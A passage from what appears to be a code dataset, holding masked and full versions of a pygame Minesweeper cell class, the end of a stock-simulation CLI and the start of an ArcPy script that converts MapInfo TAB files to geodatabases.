do_plot(self, arg):\n calc = stk.StockCalcIndex(self.stk_data_coll)\n sd = stk.StockData()\n ticker, startdate = arg.split()\n \n sd.load(ticker, startdate)\n a_plot = plot.Plot(plot.PlotCell((sd.Cs,sd.dates)))\n \n a_plot.addSimple(plot.PlotCell( calc.sma((sd.Cs, sd.dates), 200),overlay=True))\n a_plot.addSimple(plot.PlotCell( calc.sma((sd.Cs, sd.dates), 50),overlay=True))\n a_plot.addSimple(plot.PlotCell( calc.llv((sd.Cs, sd.dates), 100),overlay=True))\n\n a_plot.addSimple(plot.PlotCell( calc.sma((sd.Vs,sd.dates),20 )))\n \n arr_obv = calc.obv((sd.Cs,sd.Vs,sd.dates) )\n a_plot.addSimple(plot.PlotCell( arr_obv)) \n \n a_plot.addSimple(plot.PlotCell( calc.sma(arr_obv, 20),overlay=True))\n a_plot.addSimple(plot.PlotCell( calc.sma(arr_obv, 60),overlay=True))\n \n \n a_plot.plot()\n\n \n def help_plot(self):\n print \"syntax: plot [ticker] []|[start date YYYYMMDD]\",\n print \"-- plots the ticker\"\n \n \n def do_simulation(self, arg):\n ticker, startdate = arg.split()\n calc = stk.StockCalcIndex(self.stk_data_coll)\n sd = stk.StockData()\n sd.load(ticker, startdate)\n\n port = des.DecisionCollection(ticker, 50000)\n decision = des.DecisionSimpleSMA(ticker, (sd.Cs, sd.dates), port)\n decision.looper()\n print ticker, \":\", str(port)\n \n port2 = des.DecisionCollection(ticker, 50000)\n decision2 = des.DecisionSimpleStopSMA(ticker, (sd.Cs, sd.dates), port2, risk_factor=0.01, )\n decision2.looper()\n print ticker, \":\", str(port2)\n port2.print_all()\n \n a_plot = plot.Plot(plot.PlotCell((sd.Cs,sd.dates)))\n \n a_plot.addSimple(plot.PlotCell( calc.sma((sd.Cs, sd.dates), 200),overlay=True))\n a_plot.addSimple(plot.PlotCell( calc.sma((sd.Cs, sd.dates), 50),overlay=True))\n a_plot.addSimple(plot.PlotCell( calc.llv((sd.Cs, sd.dates), 100),overlay=True))\n\n a_plot.addSimple(plot.PlotCell( port2.get_enter_plot_cell(), overlay=True, color='go' ))\n a_plot.addSimple(plot.PlotCell( port2.get_leave_plot_cell(), overlay=True, color='ro' ))\n \n a_plot.addSimple(plot.PlotCell( port2.get_value_plot_cell()))\n a_plot.plot()\n \n def help_simulation(self):\n print \"syntax: simulation [ticker] []|[start date YYYYMMDD]\",\n print \"-- runs a simulation on a single ticker\"\n \n \n def do_simulation_collection(self, arg ):\n for ticker in self.stk_data_coll.stk_data_coll:\n sd = stk.StockData()\n sd.load(ticker, arg)\n\n port = des.DecisionCollection(ticker, 50000)\n decision = des.DecisionSimpleStopSMA(ticker, (sd.Cs, sd.dates), port, risk_factor=0.02, sma_fast=10, sma_slow=50, stop_per=5)\n decision.looper()\n \n port4 = des.DecisionCollection(ticker, 50000)\n decision4 = des.DecisionSimpleSMA(ticker, (sd.Cs, sd.dates), port4, sma_fast=10, sma_slow=50, stop_per=5)\n decision4.looper() \n \n port2 = des.DecisionCollection(ticker, 50000)\n decision2 = des.DecisionSimpleSMA(ticker, (sd.Cs, sd.dates), port2)\n decision2.looper()\n \n port3 = des.DecisionCollection(ticker, 50000)\n decision3 = des.DecisionSimpleStopSMA(ticker, (sd.Cs, sd.dates), port3, risk_factor=0.02, sma_fast=50, sma_slow=200, stop_per=40)\n decision3.looper() \n \n print \"STOP_FAST - \", ticker, \" \", str(port)\n print \"SIMPLE_FAST - \", ticker, \" \", str(port4)\n print \"STOP_SLOW - \", ticker, \" \", str(port3)\n print \"SIMPLE_SLOW - \", ticker, \" \", str(port2)\n \n \n \n def emptyline(self):\n pass\n \n def do_quit(self, arg):\n sys.exit(1)\n \nif __name__ == \"__main__\": \n \n cli = CLI()\n cli.cmdloop()\n ",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
import pygame
from settings import *
import random
class Cell:
def __init__(self, game, x, y, bombs):
self.game = game
self.x = x
self.y = y
self.i = x // TILESIZE
self.j = y // TILESIZE
self.revelada = False
self.bomba = False
self.bombas_total = bombs
self.bombs_around = 0
self.flag_enabled = False
def reveal(self):
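        # mark the cell revealed; an empty cell cascades via flood(), a bomb ends the game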
if not self.game.is_game_over:
self.revelada = True
if self.bombs_around == 0:
self.flood()
if self.bomba:
self.game.is_game_over = True
self.game.score = 0
EFFECT.play()
def check_neighbours(self, grid):
"""
        This function will count how many bombs there are around a particular cell
"""
if self.bomba:
self.bombs_around = -1
return
total = 0
for x in range(-1, 2):
for y in range(-1, 2):
i = self.i + x
j = self.j + y
if i > -1 and i < len(grid) and j > -1 and j < len(grid[1]):
neighbor = grid[i][j]
if neighbor.bomba:
total += 1
self.bombs_around = total
def flood(self):
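        # reveal unflagged, unrevealed neighbours; numbered cells are revealed but stop the cascade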
for x in range(-1, 2):
for y in range(-1, 2):
i = self.i + x
j = self.j + y
if i > -1 and i < len(self.game.grid) and j > -1 and j < len(self.game.grid[1]):
neighbor = self.game.grid[i][j]
if not neighbor.revelada and not neighbor.flag_enabled and not self.game.is_game_over:
neighbor.reveal()
def enable_flag(self):
self.flag_enabled = not self.flag_enabled
if self.bomba: # TODO: and self.flag_enabled
self.game.score += 1
# TODO: else: self.game.score -= 1
# all the spots revealed shouldn't be a bomb
def draw_number(self):
"""
This function will draw the numbers according to the total of bombs around the cell.
        It also assigns a color to each number.
"""
text_color = (0, 0, 0)
if self.bombs_around == 1:
text_color = (0, 0, 150)
if self.bombs_around == 2:
text_color = (0, 150, 0)
if self.bombs_around == 3:
text_color = (150, 0, 0)
if self.bombs_around == 4:
text_color = (133, 39, 138)
if self.bombs_around == 5:
text_color = (128, 0, 0)
if self.bombs_around == 6:
text_color = (175, 238, 238)
if self.bombs_around == 7:
text_color = (0, 0, 0)
if self.bombs_around == 8:
text_color = (33, 161, 166)
font = pygame.font.Font("fonts/JetBrainsMono-Bold.ttf", 24)
if self.bombs_around > 0 and self.revelada:
text = font.render(
str(self.bombs_around), False, text_color)
self.game.screen.blit(text, (self.x + 12, self.y))
def set_bomb(self):
"""
This function will turn this cell into a cell with a bomb
(just to keep organized)
"""
self.bomba = True
def draw_cell(self):
pygame.draw.rect(
self.game.screen, WHITE, (self.x, self.y, TILESIZE - 1, TILESIZE - 1))
if self.revelada:
if self.bomba:
pygame.draw.rect(
self.game.screen, RED, (self.x + 10, self.y + 10, TILESIZE - 23, TILESIZE - 23))
else:
pygame.draw.rect(
self.game.screen, GRAY, (self.x, self.y, TILESIZE - 1, TILESIZE - 1))
if self.flag_enabled and not self.revelada:
self.game.flag.draw(self.game.screen, self.x + 10, self.y + 10)
def get_mouse_pos(self):
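        # translate the mouse pixel position into grid column/row indices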
mouse = pygame.mouse.get_pos()
return [mouse[0] // TILESIZE, mouse[1] // TILESIZE]
|
normal
|
{
"blob_id": "e31f1e24c319f338d728661dfd50e758526112d6",
"index": 7796,
"step-1": "<mask token>\n\n\nclass Cell:\n <mask token>\n\n def reveal(self):\n if not self.game.is_game_over:\n self.revelada = True\n if self.bombs_around == 0:\n self.flood()\n if self.bomba:\n self.game.is_game_over = True\n self.game.score = 0\n EFFECT.play()\n\n def check_neighbours(self, grid):\n \"\"\"\n This function will count how many bombs there is around a particular cell\n \"\"\"\n if self.bomba:\n self.bombs_around = -1\n return\n total = 0\n for x in range(-1, 2):\n for y in range(-1, 2):\n i = self.i + x\n j = self.j + y\n if i > -1 and i < len(grid) and j > -1 and j < len(grid[1]):\n neighbor = grid[i][j]\n if neighbor.bomba:\n total += 1\n self.bombs_around = total\n <mask token>\n <mask token>\n\n def draw_number(self):\n \"\"\"\n This function will draw the numbers according to the total of bombs around the cell.\n Also it will give colors to some numbers\n \"\"\"\n text_color = 0, 0, 0\n if self.bombs_around == 1:\n text_color = 0, 0, 150\n if self.bombs_around == 2:\n text_color = 0, 150, 0\n if self.bombs_around == 3:\n text_color = 150, 0, 0\n if self.bombs_around == 4:\n text_color = 133, 39, 138\n if self.bombs_around == 5:\n text_color = 128, 0, 0\n if self.bombs_around == 6:\n text_color = 175, 238, 238\n if self.bombs_around == 7:\n text_color = 0, 0, 0\n if self.bombs_around == 8:\n text_color = 33, 161, 166\n font = pygame.font.Font('fonts/JetBrainsMono-Bold.ttf', 24)\n if self.bombs_around > 0 and self.revelada:\n text = font.render(str(self.bombs_around), False, text_color)\n self.game.screen.blit(text, (self.x + 12, self.y))\n <mask token>\n\n def draw_cell(self):\n pygame.draw.rect(self.game.screen, WHITE, (self.x, self.y, TILESIZE -\n 1, TILESIZE - 1))\n if self.revelada:\n if self.bomba:\n pygame.draw.rect(self.game.screen, RED, (self.x + 10, self.\n y + 10, TILESIZE - 23, TILESIZE - 23))\n else:\n pygame.draw.rect(self.game.screen, GRAY, (self.x, self.y, \n TILESIZE - 1, TILESIZE - 1))\n if self.flag_enabled and not self.revelada:\n self.game.flag.draw(self.game.screen, self.x + 10, self.y + 10)\n\n def get_mouse_pos(self):\n mouse = pygame.mouse.get_pos()\n return [mouse[0] // TILESIZE, mouse[1] // TILESIZE]\n",
"step-2": "<mask token>\n\n\nclass Cell:\n\n def __init__(self, game, x, y, bombs):\n self.game = game\n self.x = x\n self.y = y\n self.i = x // TILESIZE\n self.j = y // TILESIZE\n self.revelada = False\n self.bomba = False\n self.bombas_total = bombs\n self.bombs_around = 0\n self.flag_enabled = False\n\n def reveal(self):\n if not self.game.is_game_over:\n self.revelada = True\n if self.bombs_around == 0:\n self.flood()\n if self.bomba:\n self.game.is_game_over = True\n self.game.score = 0\n EFFECT.play()\n\n def check_neighbours(self, grid):\n \"\"\"\n This function will count how many bombs there is around a particular cell\n \"\"\"\n if self.bomba:\n self.bombs_around = -1\n return\n total = 0\n for x in range(-1, 2):\n for y in range(-1, 2):\n i = self.i + x\n j = self.j + y\n if i > -1 and i < len(grid) and j > -1 and j < len(grid[1]):\n neighbor = grid[i][j]\n if neighbor.bomba:\n total += 1\n self.bombs_around = total\n\n def flood(self):\n for x in range(-1, 2):\n for y in range(-1, 2):\n i = self.i + x\n j = self.j + y\n if i > -1 and i < len(self.game.grid) and j > -1 and j < len(\n self.game.grid[1]):\n neighbor = self.game.grid[i][j]\n if (not neighbor.revelada and not neighbor.flag_enabled and\n not self.game.is_game_over):\n neighbor.reveal()\n\n def enable_flag(self):\n self.flag_enabled = not self.flag_enabled\n if self.bomba:\n self.game.score += 1\n\n def draw_number(self):\n \"\"\"\n This function will draw the numbers according to the total of bombs around the cell.\n Also it will give colors to some numbers\n \"\"\"\n text_color = 0, 0, 0\n if self.bombs_around == 1:\n text_color = 0, 0, 150\n if self.bombs_around == 2:\n text_color = 0, 150, 0\n if self.bombs_around == 3:\n text_color = 150, 0, 0\n if self.bombs_around == 4:\n text_color = 133, 39, 138\n if self.bombs_around == 5:\n text_color = 128, 0, 0\n if self.bombs_around == 6:\n text_color = 175, 238, 238\n if self.bombs_around == 7:\n text_color = 0, 0, 0\n if self.bombs_around == 8:\n text_color = 33, 161, 166\n font = pygame.font.Font('fonts/JetBrainsMono-Bold.ttf', 24)\n if self.bombs_around > 0 and self.revelada:\n text = font.render(str(self.bombs_around), False, text_color)\n self.game.screen.blit(text, (self.x + 12, self.y))\n <mask token>\n\n def draw_cell(self):\n pygame.draw.rect(self.game.screen, WHITE, (self.x, self.y, TILESIZE -\n 1, TILESIZE - 1))\n if self.revelada:\n if self.bomba:\n pygame.draw.rect(self.game.screen, RED, (self.x + 10, self.\n y + 10, TILESIZE - 23, TILESIZE - 23))\n else:\n pygame.draw.rect(self.game.screen, GRAY, (self.x, self.y, \n TILESIZE - 1, TILESIZE - 1))\n if self.flag_enabled and not self.revelada:\n self.game.flag.draw(self.game.screen, self.x + 10, self.y + 10)\n\n def get_mouse_pos(self):\n mouse = pygame.mouse.get_pos()\n return [mouse[0] // TILESIZE, mouse[1] // TILESIZE]\n",
"step-3": "<mask token>\n\n\nclass Cell:\n\n def __init__(self, game, x, y, bombs):\n self.game = game\n self.x = x\n self.y = y\n self.i = x // TILESIZE\n self.j = y // TILESIZE\n self.revelada = False\n self.bomba = False\n self.bombas_total = bombs\n self.bombs_around = 0\n self.flag_enabled = False\n\n def reveal(self):\n if not self.game.is_game_over:\n self.revelada = True\n if self.bombs_around == 0:\n self.flood()\n if self.bomba:\n self.game.is_game_over = True\n self.game.score = 0\n EFFECT.play()\n\n def check_neighbours(self, grid):\n \"\"\"\n This function will count how many bombs there is around a particular cell\n \"\"\"\n if self.bomba:\n self.bombs_around = -1\n return\n total = 0\n for x in range(-1, 2):\n for y in range(-1, 2):\n i = self.i + x\n j = self.j + y\n if i > -1 and i < len(grid) and j > -1 and j < len(grid[1]):\n neighbor = grid[i][j]\n if neighbor.bomba:\n total += 1\n self.bombs_around = total\n\n def flood(self):\n for x in range(-1, 2):\n for y in range(-1, 2):\n i = self.i + x\n j = self.j + y\n if i > -1 and i < len(self.game.grid) and j > -1 and j < len(\n self.game.grid[1]):\n neighbor = self.game.grid[i][j]\n if (not neighbor.revelada and not neighbor.flag_enabled and\n not self.game.is_game_over):\n neighbor.reveal()\n\n def enable_flag(self):\n self.flag_enabled = not self.flag_enabled\n if self.bomba:\n self.game.score += 1\n\n def draw_number(self):\n \"\"\"\n This function will draw the numbers according to the total of bombs around the cell.\n Also it will give colors to some numbers\n \"\"\"\n text_color = 0, 0, 0\n if self.bombs_around == 1:\n text_color = 0, 0, 150\n if self.bombs_around == 2:\n text_color = 0, 150, 0\n if self.bombs_around == 3:\n text_color = 150, 0, 0\n if self.bombs_around == 4:\n text_color = 133, 39, 138\n if self.bombs_around == 5:\n text_color = 128, 0, 0\n if self.bombs_around == 6:\n text_color = 175, 238, 238\n if self.bombs_around == 7:\n text_color = 0, 0, 0\n if self.bombs_around == 8:\n text_color = 33, 161, 166\n font = pygame.font.Font('fonts/JetBrainsMono-Bold.ttf', 24)\n if self.bombs_around > 0 and self.revelada:\n text = font.render(str(self.bombs_around), False, text_color)\n self.game.screen.blit(text, (self.x + 12, self.y))\n\n def set_bomb(self):\n \"\"\"\n This function will turn this cell into a cell with a bomb \n (just to keep organized)\n \"\"\"\n self.bomba = True\n\n def draw_cell(self):\n pygame.draw.rect(self.game.screen, WHITE, (self.x, self.y, TILESIZE -\n 1, TILESIZE - 1))\n if self.revelada:\n if self.bomba:\n pygame.draw.rect(self.game.screen, RED, (self.x + 10, self.\n y + 10, TILESIZE - 23, TILESIZE - 23))\n else:\n pygame.draw.rect(self.game.screen, GRAY, (self.x, self.y, \n TILESIZE - 1, TILESIZE - 1))\n if self.flag_enabled and not self.revelada:\n self.game.flag.draw(self.game.screen, self.x + 10, self.y + 10)\n\n def get_mouse_pos(self):\n mouse = pygame.mouse.get_pos()\n return [mouse[0] // TILESIZE, mouse[1] // TILESIZE]\n",
"step-4": "import pygame\nfrom settings import *\nimport random\n\n\nclass Cell:\n\n def __init__(self, game, x, y, bombs):\n self.game = game\n self.x = x\n self.y = y\n self.i = x // TILESIZE\n self.j = y // TILESIZE\n self.revelada = False\n self.bomba = False\n self.bombas_total = bombs\n self.bombs_around = 0\n self.flag_enabled = False\n\n def reveal(self):\n if not self.game.is_game_over:\n self.revelada = True\n if self.bombs_around == 0:\n self.flood()\n if self.bomba:\n self.game.is_game_over = True\n self.game.score = 0\n EFFECT.play()\n\n def check_neighbours(self, grid):\n \"\"\"\n This function will count how many bombs there is around a particular cell\n \"\"\"\n if self.bomba:\n self.bombs_around = -1\n return\n total = 0\n for x in range(-1, 2):\n for y in range(-1, 2):\n i = self.i + x\n j = self.j + y\n if i > -1 and i < len(grid) and j > -1 and j < len(grid[1]):\n neighbor = grid[i][j]\n if neighbor.bomba:\n total += 1\n self.bombs_around = total\n\n def flood(self):\n for x in range(-1, 2):\n for y in range(-1, 2):\n i = self.i + x\n j = self.j + y\n if i > -1 and i < len(self.game.grid) and j > -1 and j < len(\n self.game.grid[1]):\n neighbor = self.game.grid[i][j]\n if (not neighbor.revelada and not neighbor.flag_enabled and\n not self.game.is_game_over):\n neighbor.reveal()\n\n def enable_flag(self):\n self.flag_enabled = not self.flag_enabled\n if self.bomba:\n self.game.score += 1\n\n def draw_number(self):\n \"\"\"\n This function will draw the numbers according to the total of bombs around the cell.\n Also it will give colors to some numbers\n \"\"\"\n text_color = 0, 0, 0\n if self.bombs_around == 1:\n text_color = 0, 0, 150\n if self.bombs_around == 2:\n text_color = 0, 150, 0\n if self.bombs_around == 3:\n text_color = 150, 0, 0\n if self.bombs_around == 4:\n text_color = 133, 39, 138\n if self.bombs_around == 5:\n text_color = 128, 0, 0\n if self.bombs_around == 6:\n text_color = 175, 238, 238\n if self.bombs_around == 7:\n text_color = 0, 0, 0\n if self.bombs_around == 8:\n text_color = 33, 161, 166\n font = pygame.font.Font('fonts/JetBrainsMono-Bold.ttf', 24)\n if self.bombs_around > 0 and self.revelada:\n text = font.render(str(self.bombs_around), False, text_color)\n self.game.screen.blit(text, (self.x + 12, self.y))\n\n def set_bomb(self):\n \"\"\"\n This function will turn this cell into a cell with a bomb \n (just to keep organized)\n \"\"\"\n self.bomba = True\n\n def draw_cell(self):\n pygame.draw.rect(self.game.screen, WHITE, (self.x, self.y, TILESIZE -\n 1, TILESIZE - 1))\n if self.revelada:\n if self.bomba:\n pygame.draw.rect(self.game.screen, RED, (self.x + 10, self.\n y + 10, TILESIZE - 23, TILESIZE - 23))\n else:\n pygame.draw.rect(self.game.screen, GRAY, (self.x, self.y, \n TILESIZE - 1, TILESIZE - 1))\n if self.flag_enabled and not self.revelada:\n self.game.flag.draw(self.game.screen, self.x + 10, self.y + 10)\n\n def get_mouse_pos(self):\n mouse = pygame.mouse.get_pos()\n return [mouse[0] // TILESIZE, mouse[1] // TILESIZE]\n",
"step-5": "import pygame\nfrom settings import *\nimport random\n\n\nclass Cell:\n def __init__(self, game, x, y, bombs):\n self.game = game\n self.x = x\n self.y = y\n self.i = x // TILESIZE\n self.j = y // TILESIZE\n self.revelada = False\n self.bomba = False\n self.bombas_total = bombs\n self.bombs_around = 0\n self.flag_enabled = False\n\n def reveal(self):\n if not self.game.is_game_over:\n self.revelada = True\n\n if self.bombs_around == 0:\n self.flood()\n if self.bomba:\n self.game.is_game_over = True\n self.game.score = 0\n EFFECT.play()\n\n def check_neighbours(self, grid):\n \"\"\"\n This function will count how many bombs there is around a particular cell\n \"\"\"\n if self.bomba:\n self.bombs_around = -1\n return\n\n total = 0\n for x in range(-1, 2):\n for y in range(-1, 2):\n i = self.i + x\n j = self.j + y\n if i > -1 and i < len(grid) and j > -1 and j < len(grid[1]):\n neighbor = grid[i][j]\n\n if neighbor.bomba:\n total += 1\n \n self.bombs_around = total\n\n def flood(self):\n for x in range(-1, 2):\n for y in range(-1, 2):\n i = self.i + x\n j = self.j + y\n if i > -1 and i < len(self.game.grid) and j > -1 and j < len(self.game.grid[1]):\n neighbor = self.game.grid[i][j]\n\n if not neighbor.revelada and not neighbor.flag_enabled and not self.game.is_game_over:\n neighbor.reveal()\n\n def enable_flag(self):\n self.flag_enabled = not self.flag_enabled\n if self.bomba: # TODO: and self.flag_enabled\n self.game.score += 1\n # TODO: else: self.game.score -= 1\n # all the spots revealed shouldn't be a bomb\n\n def draw_number(self):\n \"\"\"\n This function will draw the numbers according to the total of bombs around the cell.\n Also it will give colors to some numbers\n \"\"\"\n text_color = (0, 0, 0)\n if self.bombs_around == 1:\n text_color = (0, 0, 150)\n if self.bombs_around == 2:\n text_color = (0, 150, 0)\n if self.bombs_around == 3:\n text_color = (150, 0, 0)\n if self.bombs_around == 4:\n text_color = (133, 39, 138)\n if self.bombs_around == 5:\n text_color = (128, 0, 0)\n if self.bombs_around == 6:\n text_color = (175, 238, 238)\n if self.bombs_around == 7:\n text_color = (0, 0, 0)\n if self.bombs_around == 8:\n text_color = (33, 161, 166)\n\n font = pygame.font.Font(\"fonts/JetBrainsMono-Bold.ttf\", 24)\n if self.bombs_around > 0 and self.revelada:\n text = font.render(\n str(self.bombs_around), False, text_color)\n self.game.screen.blit(text, (self.x + 12, self.y))\n\n def set_bomb(self):\n \"\"\"\n This function will turn this cell into a cell with a bomb \n (just to keep organized)\n \"\"\"\n self.bomba = True\n\n def draw_cell(self):\n\n pygame.draw.rect(\n self.game.screen, WHITE, (self.x, self.y, TILESIZE - 1, TILESIZE - 1))\n\n if self.revelada:\n if self.bomba:\n pygame.draw.rect(\n self.game.screen, RED, (self.x + 10, self.y + 10, TILESIZE - 23, TILESIZE - 23))\n else:\n pygame.draw.rect(\n self.game.screen, GRAY, (self.x, self.y, TILESIZE - 1, TILESIZE - 1))\n if self.flag_enabled and not self.revelada:\n self.game.flag.draw(self.game.screen, self.x + 10, self.y + 10)\n\n def get_mouse_pos(self):\n mouse = pygame.mouse.get_pos()\n return [mouse[0] // TILESIZE, mouse[1] // TILESIZE]\n",
"step-ids": [
6,
9,
10,
11,
12
]
}
|
[
6,
9,
10,
11,
12
] |
# -*- coding: cp1251 -*-
import arcpy as a
from arcpy import AddMessage as msg, AddWarning as warning, AddError as error
from os import mkdir, walk
from os.path import join, dirname, basename, splitext
from glob import glob as get_files
from shutil import copy
from collections import OrderedDict
input_folder = a.GetParameterAsText(0)
output_folder = a.GetParameterAsText(1)
enable_rewrite_databases = a.GetParameterAsText(2)
enable_rewrite_tabs = a.GetParameterAsText(3)
input_folders_order = [root.replace(input_folder + '\\', '') for root, dirs, _ in walk(input_folder)]
output_folders_order = [root.replace(output_folder + '\\', '') for root, dirs, _ in walk(output_folder)]
input_folders_unordered_dict = {root.replace(input_folder + '\\', ''):dirs for root, dirs, _ in walk(input_folder)}
output_folders_unordered_dict = {root.replace(output_folder + '\\', ''):dirs for root, dirs, _ in walk(output_folder)}
input_folders = OrderedDict((k, input_folders_unordered_dict[k]) for k in input_folders_order)
output_folders = OrderedDict((k, output_folders_unordered_dict[k]) for k in output_folders_order)
msg("\nПроверка на наличие подпапок исходной папки в выходной:")
for folder in input_folders:
if folder in output_folders:
warning(' ' + folder)
else:
error(' ' + folder)
msg("\nПроверка на наличие подпапок выходной папки в исходной:")
remove_list = []
for folder in output_folders:
if folder in input_folders:
warning(' ' + folder)
else:
remove_list.append(folder)
error(' ' + folder)
for folder in remove_list:
output_folders.pop(folder, None)
msg("\nКопирование файлов в папки...")
remove_list = []
for subfolders in output_folders:
tab_files = [tab_file for tab_file in get_files(join(input_folder, subfolders, "*.TAB"))]
if not tab_files:
remove_list.append(subfolders)
if u"Импорт" in subfolders:
continue
else:
similar_output_folder = join(output_folder, subfolders)
msg(' ' + subfolders)
files_to_copy = [copy_file for copy_file in get_files(join(input_folder, subfolders, "*.*"))]
for file_to_copy in files_to_copy:
_, file_extension = splitext(file_to_copy)
if file_extension not in ['.wor', '.WOR', '.TAB', '.DAT', '.ID', '.IND', '.MAP']:
msg(' ' + file_to_copy)
copy(file_to_copy, similar_output_folder)
for folder in remove_list:
output_folders.pop(folder, None)
output_folders.pop('', None)
msg("\nСоздание баз данных...")
for output_subfolders in output_folders:
mdb_name = basename(output_subfolders)
mdb_local_path = join(output_subfolders, mdb_name + ".mdb")
if enable_rewrite_databases == 'true':
a.Delete_management(join(output_folder, output_subfolders, mdb_name + ".mdb"))
try:
a.CreatePersonalGDB_management(join(output_folder, output_subfolders), mdb_name + ".mdb")
msg(" " + mdb_local_path)
except a.ExecuteError:
warning(" " + mdb_local_path)
msg("\nКонвертация TAB в слои...")
layer_types = ['Line', 'NoGeometry', 'Point', 'Polygon', 'Text']
for subfolders in output_folders:
tab_files = [tab_file for tab_file in get_files(join(input_folder, subfolders, "*.TAB"))]
for tab_file_path in tab_files:
for layer_type in layer_types:
tab_name = basename(tab_file_path).replace('.TAB', '')
layer_from_name = tab_name + ' ' + layer_type
layer_from = join(tab_file_path, layer_from_name)
a.Exists(layer_from)
if not a.Exists(layer_from):
continue
layer_to_name = layer_from_name.replace(' ', '_')
if layer_to_name[0].isdigit():
layer_to_name = 'L' + layer_to_name
layer_to = join(output_folder, subfolders, basename(subfolders) + '.mdb', layer_to_name)
local_tab_path = join(subfolders, tab_name + '.TAB')
if a.Exists(layer_to) and enable_rewrite_tabs == 'true':
a.Delete_management(layer_to)
msg(u' ' + local_tab_path + ' ' + layer_type)
elif a.Exists(layer_to):
warning(u' ' + local_tab_path + ' ' + layer_type)
continue
elif not a.Exists(layer_to):
msg(u' ' + local_tab_path + ' ' + layer_type)
try:
a.CopyFeatures_management(layer_from, layer_to)
except:
try:
a.CopyRows_management(layer_from, layer_to)
except Exception as e:
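                        # i.e. "Error: copying the features/rows did not work:"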
error(' Ошибка. Копирование объектов/строк не сработало:' + str(e))
|
normal
|
{
"blob_id": "409e0fc0b1c1d86c5526d33ba271a8387eecf748",
"index": 9872,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nmsg(\"\"\"\nПроверка на наличие подпапок исходной папки в выходной:\"\"\")\nfor folder in input_folders:\n if folder in output_folders:\n warning(' ' + folder)\n else:\n error(' ' + folder)\nmsg(\"\"\"\nПроверка на наличие подпапок выходной папки в исходной:\"\"\")\n<mask token>\nfor folder in output_folders:\n if folder in input_folders:\n warning(' ' + folder)\n else:\n remove_list.append(folder)\n error(' ' + folder)\nfor folder in remove_list:\n output_folders.pop(folder, None)\nmsg(\"\"\"\nКопирование файлов в папки...\"\"\")\n<mask token>\nfor subfolders in output_folders:\n tab_files = [tab_file for tab_file in get_files(join(input_folder,\n subfolders, '*.TAB'))]\n if not tab_files:\n remove_list.append(subfolders)\n if u'Импорт' in subfolders:\n continue\n else:\n similar_output_folder = join(output_folder, subfolders)\n msg(' ' + subfolders)\n files_to_copy = [copy_file for copy_file in get_files(join(input_folder,\n subfolders, '*.*'))]\n for file_to_copy in files_to_copy:\n _, file_extension = splitext(file_to_copy)\n if file_extension not in ['.wor', '.WOR', '.TAB', '.DAT', '.ID',\n '.IND', '.MAP']:\n msg(' ' + file_to_copy)\n copy(file_to_copy, similar_output_folder)\nfor folder in remove_list:\n output_folders.pop(folder, None)\noutput_folders.pop('', None)\nmsg(\"\"\"\nСоздание баз данных...\"\"\")\nfor output_subfolders in output_folders:\n mdb_name = basename(output_subfolders)\n mdb_local_path = join(output_subfolders, mdb_name + '.mdb')\n if enable_rewrite_databases == 'true':\n a.Delete_management(join(output_folder, output_subfolders, mdb_name +\n '.mdb'))\n try:\n a.CreatePersonalGDB_management(join(output_folder,\n output_subfolders), mdb_name + '.mdb')\n msg(' ' + mdb_local_path)\n except a.ExecuteError:\n warning(' ' + mdb_local_path)\nmsg(\"\"\"\nКонвертация TAB в слои...\"\"\")\n<mask token>\nfor subfolders in output_folders:\n tab_files = [tab_file for tab_file in get_files(join(input_folder,\n subfolders, '*.TAB'))]\n for tab_file_path in tab_files:\n for layer_type in layer_types:\n tab_name = basename(tab_file_path).replace('.TAB', '')\n layer_from_name = tab_name + ' ' + layer_type\n layer_from = join(tab_file_path, layer_from_name)\n a.Exists(layer_from)\n if not a.Exists(layer_from):\n continue\n layer_to_name = layer_from_name.replace(' ', '_')\n if layer_to_name[0].isdigit():\n layer_to_name = 'L' + layer_to_name\n layer_to = join(output_folder, subfolders, basename(subfolders) +\n '.mdb', layer_to_name)\n local_tab_path = join(subfolders, tab_name + '.TAB')\n if a.Exists(layer_to) and enable_rewrite_tabs == 'true':\n a.Delete_management(layer_to)\n msg(u' ' + local_tab_path + ' ' + layer_type)\n elif a.Exists(layer_to):\n warning(u' ' + local_tab_path + ' ' + layer_type)\n continue\n elif not a.Exists(layer_to):\n msg(u' ' + local_tab_path + ' ' + layer_type)\n try:\n a.CopyFeatures_management(layer_from, layer_to)\n except:\n try:\n a.CopyRows_management(layer_from, layer_to)\n except Exception as e:\n error(\n ' Ошибка. Копирование объектов/строк не сработало:'\n + str(e))\n",
"step-3": "<mask token>\ninput_folder = a.GetParameterAsText(0)\noutput_folder = a.GetParameterAsText(1)\nenable_rewrite_databases = a.GetParameterAsText(2)\nenable_rewrite_tabs = a.GetParameterAsText(3)\ninput_folders_order = [root.replace(input_folder + '\\\\', '') for root, dirs,\n _ in walk(input_folder)]\noutput_folders_order = [root.replace(output_folder + '\\\\', '') for root,\n dirs, _ in walk(output_folder)]\ninput_folders_unordered_dict = {root.replace(input_folder + '\\\\', ''): dirs for\n root, dirs, _ in walk(input_folder)}\noutput_folders_unordered_dict = {root.replace(output_folder + '\\\\', ''):\n dirs for root, dirs, _ in walk(output_folder)}\ninput_folders = OrderedDict((k, input_folders_unordered_dict[k]) for k in\n input_folders_order)\noutput_folders = OrderedDict((k, output_folders_unordered_dict[k]) for k in\n output_folders_order)\nmsg(\"\"\"\nПроверка на наличие подпапок исходной папки в выходной:\"\"\")\nfor folder in input_folders:\n if folder in output_folders:\n warning(' ' + folder)\n else:\n error(' ' + folder)\nmsg(\"\"\"\nПроверка на наличие подпапок выходной папки в исходной:\"\"\")\nremove_list = []\nfor folder in output_folders:\n if folder in input_folders:\n warning(' ' + folder)\n else:\n remove_list.append(folder)\n error(' ' + folder)\nfor folder in remove_list:\n output_folders.pop(folder, None)\nmsg(\"\"\"\nКопирование файлов в папки...\"\"\")\nremove_list = []\nfor subfolders in output_folders:\n tab_files = [tab_file for tab_file in get_files(join(input_folder,\n subfolders, '*.TAB'))]\n if not tab_files:\n remove_list.append(subfolders)\n if u'Импорт' in subfolders:\n continue\n else:\n similar_output_folder = join(output_folder, subfolders)\n msg(' ' + subfolders)\n files_to_copy = [copy_file for copy_file in get_files(join(input_folder,\n subfolders, '*.*'))]\n for file_to_copy in files_to_copy:\n _, file_extension = splitext(file_to_copy)\n if file_extension not in ['.wor', '.WOR', '.TAB', '.DAT', '.ID',\n '.IND', '.MAP']:\n msg(' ' + file_to_copy)\n copy(file_to_copy, similar_output_folder)\nfor folder in remove_list:\n 